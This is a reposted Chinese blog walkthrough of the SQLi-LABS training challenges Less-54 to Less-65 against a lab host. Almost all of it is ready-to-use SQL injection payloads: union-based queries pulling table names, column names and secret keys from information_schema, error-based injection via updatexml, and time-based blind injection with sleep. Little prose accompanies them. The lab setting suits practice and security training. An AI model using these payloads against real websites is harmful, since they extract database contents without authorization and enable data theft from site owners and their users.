SQLi-LABS Page-4 (Challenges) Less-54-Less-65

Less-54 union - 1

http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

zgysfs4pe4

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第1张图片

http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7a677973667334706534)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第2张图片

secret_7MLR

 http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(secret_7MLR+SEPARATOR+0x3c62723e)+FROM+zgysfs4pe4)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第3张图片

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第4张图片

 

 

 

Less-55 union - 2

SELECT * FROM security.users WHERE id=($id) LIMIT 0,1

http://10.10.202.112/sqli/Less-55?id=-1) union select 1,2,(SELECT+GROUP_CONCAT(id,0x7e,secret_L9QL+SEPARATOR+0x3c62723e)+FROM+qqks4m1bux)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第5张图片 

 SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第6张图片

 

Less-56 union - 3

SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1

http://10.10.202.112/sqli/Less-56?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

j7gins5xve

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第7张图片

 

http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6a3767696e7335787665)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第8张图片

http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(secret_IZ5L+SEPARATOR+0x3c62723e)+FROM+j7gins5xve)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第9张图片

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第10张图片

 

Less- 57 union - 4

$id= '"'.$id.'"';

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

suhaxhpjdj

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第11张图片

 http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x737568617868706a646a)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第12张图片

secret_091Y

 http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(secret_091Y+SEPARATOR+0x3c62723e)+FROM+suhaxhpjdj)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第13张图片

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第14张图片

 

Less-58 报错型盲注 - 1

http://10.10.202.112/sqli/Less-58?id=1'  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

sa77s59fy3

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第15张图片

 

http://10.10.202.112/sqli/Less-58?id=1'   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x73613737733539667933 limit 2,1)),null)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第16张图片

 

http://10.10.202.112/sqli/Less-58?id=1'    and updatexml(null,concat(0x0a,(select concat(secret_LNXT) from sa77s59fy3 limit 0,1)),null)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第17张图片

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第18张图片

 

Less-59 报错型盲注 - 2

http://10.10.202.112/sqli/Less-59?id=1  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

6ew31kswfa

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第19张图片

 

 http://10.10.202.112/sqli/Less-59?id=1   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x7a6c713665616533616c limit 2,1)),null)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第20张图片

http://10.10.202.112/sqli/Less-59?id=1    and updatexml(null,concat(0x0a,(select concat(secret_PCWB) from zlq6eae3al limit 0,1)),null)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第21张图片

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第22张图片

 

Less- 60 报错型盲注 - 3

-1")--+ 进行闭合

http://10.10.202.112/sqli/Less-60?id=-1")     and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

hcgeeqbc27

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第23张图片

http://10.10.202.112/sqli/Less-60?id=-1")      and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x68636765657162633237 limit 2,1)),null)--+

secret_6YDQ

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第24张图片

 http://10.10.202.112/sqli/Less-60?id=-1")    and updatexml(null,concat(0x0a,(select concat(secret_6YDQ) from hcgeeqbc27 limit 0,1)),null)--+ SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第25张图片

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第26张图片

 

Less 61 报错型盲注 - 4

1')) --+ 进行闭合

http://10.10.202.112/sqli/Less-61/index.php?id=1' ))   and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

aum8al0pvg

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第27张图片

http://10.10.202.112/sqli/Less-61/index.php?id=1' ))    and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x61756d38616c30707667 limit 2,1)),null)--+

secret_8MGI

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第28张图片

 http://10.10.202.112/sqli/Less-61/index.php?id=1' ))     and updatexml(null,concat(0x0a,(select concat(secret_8MGI) from aum8al0pvg limit 0,1)),null)--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第29张图片

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第30张图片

 

Less-62 盲注 - 1

http://10.10.202.112/sqli/Less-62?id=1') and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(5))--+

http://10.10.202.112/sqli/Less-62?id=1') and if(substr(@@version,1,1)>5,0,sleep(5))--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第31张图片

Less-63 盲注 - 2

1'--+ 进行闭合

http://10.10.202.112/sqli/Less-63?id=1' and if(substr(@@version,1,1)>5,0,sleep(5))--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第32张图片

 

Less-64 盲注 - 3

http://10.10.202.112/sqli/Less-64?id=1)) and if(substr(@@version,1,1)>5,0,sleep(5))--+

Less-65 盲注 - 4

http://10.10.202.112/sqli/Less-65?id=1") and if(substr(@@version,1,1)>5,0,sleep(5))--+

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第33张图片

 

完结!!!

点击赞赏二维码,您的支持将鼓励我继续创作!

SQLi-LABS Page-4 (Challenges) Less-54-Less-65_第34张图片 

转载于:https://www.cnblogs.com/hack404/p/11099163.html

你可能感兴趣的:(SQLi-LABS Page-4 (Challenges) Less-54-Less-65)